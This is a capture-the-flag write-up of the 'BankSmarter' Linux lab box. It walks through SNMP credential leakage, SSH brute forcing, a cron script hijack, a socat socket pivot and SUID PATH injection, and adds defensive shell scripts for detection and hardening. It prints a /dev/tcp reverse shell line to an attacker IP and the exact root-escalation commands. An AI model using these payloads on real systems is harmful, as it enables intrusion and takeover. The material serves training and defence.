Banksmarter
This box is provided by HackSmarter https://www.hacksmarter.org/
Scenario
You are a senior operator on the Hack Smarter Red Team, tasked with a penetration test against a standalone Linux server. Your objective is to gain initial access and escalate privileges to root, emulating a worst-case scenario where a threat actor successfully compromises a critical asset.
You have been given the IP address of the target server and your mission is to gain a foothold, escalate to the root user, and retrieve the final flag from the /root/ directory.
Overview
BankSmarter is a standalone Linux server penetration test simulating a worst-case compromise of a critical banking asset. The attack chain begins with SNMP enumeration leaking credentials, progresses through SSH brute-forcing for initial access, and chains two privilege escalation vectors - a cronjob-based script hijack for lateral movement to a second user, and a PATH injection vulnerability in a SUID binary to reach root.
Attack Summary:
- Recon: TCP/UDP nmap + rustscan → SNMP on UDP 161 leaks a username and password
- Foothold: Username permutation with namemash + SSH brute-force with hydra → shell as layne
- Lateral Movement: Cronjob executes a script in layne's home directory owned by scott.weiland → reverse shell as scott; socat unix socket pivot → shell as ronnie
- Privilege Escalation: SUID binary bank_backupd has a PATH injection flaw → root shell
Recon
TCP Port Scan
The engagement begins with a standard nmap scan using -sC (default scripts) and -sV (version detection). Two scans are run in parallel - one targeting common ports and one scanning all 65535 ports to ensure nothing is missed. Output is saved to disk for reference.
sudo nmap -sC -sV -vv -oA tcp 10.0.16.64 && sudo nmap -sC -sV -vv -p- -oA allports 10.0.16.64
Rustscan
rustscan is a fast port scanner written in Rust that dramatically speeds up host discovery by scanning all ports rapidly and then handing results off to nmap for deeper analysis. It confirms the open ports identified by nmap in a fraction of the time.
rustscan -a 10.0.16.64
UDP Port Scan
TCP scans alone are insufficient - many important services run over UDP. A UDP scan is run with -T4 for speed, targeting the full service range. This is slower than TCP scanning but critical for complete coverage.
nmap -sU -T4 -vv -oA udp 10.0.16.64
SNMP Enumeration
The UDP scan reveals port 161 is open - the standard port for SNMP (Simple Network Management Protocol). SNMP is frequently misconfigured and left with the default community string public, which grants read access to a wealth of system information including running processes, network interfaces, installed software, and sometimes even credentials.
snmpwalk is used to recursively query the SNMP tree using SNMP v2c with the default community string:
snmpwalk -c public -v 2c 10.0.16.64
The output is extensive. Buried within it are two critical pieces of information - a username and a password - likely exposed through SNMP process table entries or string OIDs that capture the command-line arguments of running processes.
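The defender-side counterpart to the enumeration above is knowing what the process table gives away before SNMP does: the host-resources table (hrSWRunParameters) returns each process's command-line arguments to anyone holding the read community string. The following is an added shell example, not part of the original write-up or of the box, that scans ps-style command lines for credential-looking arguments. The process list is a constructed sample; the service account and passwords in it are invented.

```shell
#!/bin/sh
# Added example, not from the Banksmarter write-up: find processes whose
# command line would leak a secret to anyone reading the SNMP process
# table (hrSWRunParameters) with the default community string.

# Constructed sample of `ps -eo args --no-headers` output. The service
# account and the passwords here are invented for the demo.
SAMPLE_PROCS='/usr/sbin/sshd -D
/usr/bin/python3 /opt/app/pty_server.py --user svc_demo --password Hunter2
/usr/sbin/snmpd -LOw -u Debian-snmp -g Debian-snmp -f
mysql -u report -pS3cretValue reports
/usr/bin/cron -f'

# Credential-looking argument shapes: " -pVALUE" (mysql style),
# " --password VALUE" / " --pass=VALUE", and key=value forms such as
# pass=, pwd=, token=, secret=. Matched case-insensitively.
CRED_PATTERN='(^| )-p[^ ]|(^| )--?pass(word)?( |=)|(pass|pwd|token|secret)='

# Print every command line from $1 that matches CRED_PATTERN.
find_exposed_creds() {
    printf '%s\n' "$1" | grep -Ei "$CRED_PATTERN"
}

# Number of matching command lines (prints 0 when nothing matched).
count_exposed_creds() {
    find_exposed_creds "$1" | grep -c .
}

# To audit the live host instead of the sample:
#   find_exposed_creds "$(ps -eo args --no-headers)"
find_exposed_creds "$SAMPLE_PROCS"
```

Two of the five constructed lines are flagged (the pty_server invocation and the mysql client). On a net-snmp host the matching hardening is to replace the default community string, restrict the read-only view (the Debian default pairing of `view systemonly included .1.3.6.1.2.1.1` with `rocommunity public default -V systemonly` exposes only the system group, not the process table), and move secrets out of process arguments into files the service reads.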
Foothold
Username Generation
With a real name extracted from SNMP (e.g., "Layne Stanley"), the next step is generating plausible Linux username formats. Organizations typically follow a naming convention (firstname.lastname, flastname, etc.) and we don't know which one is in use. namemash automates this by generating all common permutations from a name input file:
/opt/namemash/namemash.py users_to_generate > generated_users
This produces the following candidate list:
laynestanley
stanleylayne
layne.stanley
stanley.layne
stanleyl
lstanley
slayne
l.stanley
s.layne
layne
stanley
SSH Brute Force
With a password already in hand and a list of plausible usernames, hydra is used to test every combination against the SSH service. Hydra parallelizes the login attempts, quickly identifying the correct username:
hydra -L generated_users -P pass ssh://10.0.16.64
Hydra returns a valid credential pair, granting SSH access to the server.
Post-Exploitation Enumeration with LinPEAS
Once on the box, linpeas.sh (Linux Privilege Escalation Awesome Script) is transferred and executed. LinPEAS performs an automated sweep of the system, checking for misconfigurations, interesting files, SUID binaries, writable directories, running processes, cron jobs, and more. The specific modules run here target the areas most likely to yield privilege escalation paths:
./lp.sh -o system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex
Lateral Movement
PATH Injection Discovery
LinPEAS flags interesting files in /usr/local/bin/. Inspecting them reveals a script that calls python3 without using an absolute path - it relies on whatever python3 resolves to via the $PATH environment variable.
This is a classic PATH injection vulnerability. If an attacker can prepend a writable directory to $PATH and place a malicious binary named python3 there, the script will execute the attacker's binary instead of the real interpreter. Since /tmp is writable by all users, this is a viable attack vector.
Cronjob-Based Script Hijack
A script is found in the current user's home directory, but it is owned by another user - scott.weiland. This is suspicious: if a privileged user or cron job executes a script they own that happens to live in another user's home directory, that other user cannot modify it - but they can replace it with a symlink or, if the script is configured to run a file by a name the current user controls, redirect execution.
pspy64 is a process monitoring tool that runs without root privileges and captures all process executions in real time, including those triggered by cron. Running it reveals that the script in the home directory is indeed executed periodically by scott.weiland, and also confirms the /opt/bank/pty_server.py script seen in the SNMP output is running as another user.
# pspy64 is run to passively monitor processes
Reverse Shell as scott.weiland
Since the script in the home folder is executed by scott.weiland via cron, a reverse shell payload is written in its place. The script connects back to the attacker's listener over TCP:
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.200.41.156/8443 0>&1
The script is made executable and placed in the home directory where the cron job expects to find it.
penelope is a feature-rich netcat alternative that provides a more stable and interactive reverse shell experience. A listener is opened on port 8443 and we wait for the cron job to fire:
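The weakness exploited here is not the script's own permissions but where it lives: whoever controls the parent directory can unlink a read-only file and drop a replacement. The following is an added shell example, not from the original write-up, that checks a cron target for exactly that: a parent directory owned by a different account than the script (the layne / scott.weiland situation), a group- or world-writable directory without the sticky bit, or a script writable by others. It uses GNU coreutils stat; the demo directories and job scripts are created locally and are not the box's files.

```shell
#!/bin/sh
# Added example, not from the Banksmarter write-up: decide whether a
# script that cron runs can be replaced by someone other than its owner.
# Requires GNU coreutils stat (-c).

# Print "OK: path" and return 0, or print "FLAG: reason" and return 1.
check_cron_target() {
    script=$1
    dir=$(dirname -- "$script")

    [ -e "$script" ] || { echo "FLAG: $script does not exist"; return 1; }

    script_uid=$(stat -c %u -- "$script")
    dir_uid=$(stat -c %u -- "$dir")
    dir_mode=$(stat -c %A -- "$dir")       # e.g. drwxr-xr-x, drwxrwxrwt
    file_mode=$(stat -c %A -- "$script")   # e.g. -rwxr-xr-x

    # Directory owned by someone else: that account can replace the file
    # regardless of the file's own permissions.
    if [ "$script_uid" != "$dir_uid" ]; then
        echo "FLAG: $script is owned by uid $script_uid but $dir by uid $dir_uid"
        return 1
    fi

    # Group- or world-writable directory without the sticky bit: any
    # writer can rename or unlink the script.
    gw=$(printf '%s' "$dir_mode" | cut -c6)
    ow=$(printf '%s' "$dir_mode" | cut -c9)
    sticky=$(printf '%s' "$dir_mode" | cut -c10)
    case $sticky in
        t|T) ;;
        *)
            if [ "$gw" = w ] || [ "$ow" = w ]; then
                echo "FLAG: $dir is writable by others ($dir_mode)"
                return 1
            fi ;;
    esac

    # The script itself writable by group or others.
    fgw=$(printf '%s' "$file_mode" | cut -c6)
    fow=$(printf '%s' "$file_mode" | cut -c9)
    if [ "$fgw" = w ] || [ "$fow" = w ]; then
        echo "FLAG: $script is writable by others ($file_mode)"
        return 1
    fi

    echo "OK: $script"
    return 0
}

# Local demonstration with two throwaway directories: a private one and
# a shared, world-writable one. Both scripts are owned by the caller, so
# the ownership branch cannot be shown without root; the mode branch is.
demo() {
    base=$(mktemp -d)
    mkdir -m 755 "$base/private"
    mkdir -m 777 "$base/shared"
    printf '#!/bin/sh\n' > "$base/private/job.sh"
    printf '#!/bin/sh\n' > "$base/shared/job.sh"
    chmod 755 "$base/private/job.sh" "$base/shared/job.sh"
    check_cron_target "$base/private/job.sh" || :
    check_cron_target "$base/shared/job.sh" || :
    rm -rf "$base"
}

demo
```

Run against a real crontab, feed each script path from the cron entries into check_cron_target; anything flagged should move to a directory owned by the executing account (or root) with mode 755, which is the actual fix for the hijack described above.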
Pivoting to ronnie via Unix Socket
Once inside as scott.weiland, a .bash_history file is discovered containing previously run commands. This reveals how the internal banking application's socket interface is accessed:
Cross-referencing the history with the files in /opt/bank/, the application exposes a Unix domain socket at /opt/bank/sockets/live.sock. Using socat, it's possible to attach to this socket and interact with the application as the user running it - ronnie:
socat stdio unix-connect:/opt/bank/sockets/live.sock
This provides a shell session in the context of ronnie.
Privilege Escalation
SUID Binary Discovery
From the ronnie context, a SUID binary named bank_backupd is found in /usr/local/bin/. SUID binaries run with the file owner's permissions regardless of who executes them - if owned by root, they execute as root. This makes them high-value targets.
Exploiting PATH Injection in bank_backupd
Inspecting bank_backupd reveals it calls python3 without an absolute path - the same PATH injection flaw identified earlier. Since we now have a shell as ronnie via the socat socket connection, we can exploit this by planting a malicious python3 in /tmp and manipulating $PATH.
The malicious python3 is a copy of the reverse shell script created earlier:
cp /tmp/rev_8443 /tmp/python3
chmod 777 /tmp/python3
Triggering Root Shell
With the fake python3 in place, the SUID binary is executed via the socat session, prepending /tmp to $PATH so it takes priority over the real interpreter locations:
socat stdio unix-connect:/opt/bank/sockets/live.sock
PATH=/tmp/ /usr/local/bin/bank_backupd
bank_backupd runs as root (SUID), calls python3, which resolves to /tmp/python3 - our reverse shell script. The shell callback arrives on the listener as root:
Root access is achieved. The flag can now be retrieved from /root/.
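The same flaw appears twice in this write-up, first when LinPEAS flags the /usr/local/bin script that calls python3 by bare name, and again when bank_backupd is exploited with PATH=/tmp. One added example covers both: the vulnerable pattern beside its hardened form. This is not bank_backupd's code and nothing in it runs with elevated privileges; /bin/sh stands in for the interpreter so the demo does not depend on where python3 is installed, and the "hijacked" lookup is a harmless echo in a throwaway directory.

```shell
#!/bin/sh
# Added example, not from the Banksmarter write-up: the unsafe and the
# hardened way for a privileged helper to start an interpreter. The
# "backup job" stands in for what bank_backupd does; /bin/sh plays the
# interpreter and nothing here runs as root.

# Vulnerable form: the interpreter name is resolved through whatever
# PATH the caller supplies. For a SUID program that is the caller's
# environment, so a writable directory placed first in PATH decides
# which "interpreter" actually runs.
run_backup_unsafe() {
    sh -c 'echo "real interpreter ran"'
}

# Hardened form: PATH fixed by the program itself, absolute path to the
# interpreter, and variables that steer the interpreter cleared (for
# python3 that would be PYTHONPATH, PYTHONHOME, PYTHONSTARTUP). The body
# is a subshell so the PATH change does not leak to the caller.
run_backup_safe() (
    PATH=/usr/bin:/bin
    export PATH
    unset ENV BASH_ENV
    /bin/sh -c 'echo "real interpreter ran"'
)

# Run $1 with a PATH whose first entry is a directory we control holding
# a marker script named like the interpreter. This mirrors the write-up's
# PATH=/tmp trick while executing nothing but an echo.
with_hijacked_path() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho "lookup hijacked"\n' > "$d/sh"
    chmod 755 "$d/sh"
    result=$(PATH="$d:$PATH"; export PATH; "$1")
    rm -rf "$d"
    printf '%s\n' "$result"
}

# The unsafe form reports "lookup hijacked"; the safe form reports
# "real interpreter ran" under the identical hostile PATH.
resolved_by_unsafe() { with_hijacked_path run_backup_unsafe; }
resolved_by_safe()   { with_hijacked_path run_backup_safe; }

echo "unsafe: $(resolved_by_unsafe)"
echo "safe:   $(resolved_by_safe)"
```

The dynamic loader already ignores LD_PRELOAD and LD_LIBRARY_PATH for set-user-ID executables, but PATH is passed through untouched, so a SUID binary that reaches system() or execvp() with a bare command name reopens the hole those loader protections closed. Resetting PATH inside the program and using absolute paths is the fix; dropping privileges before spawning any helper removes the impact even when the lookup goes wrong.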

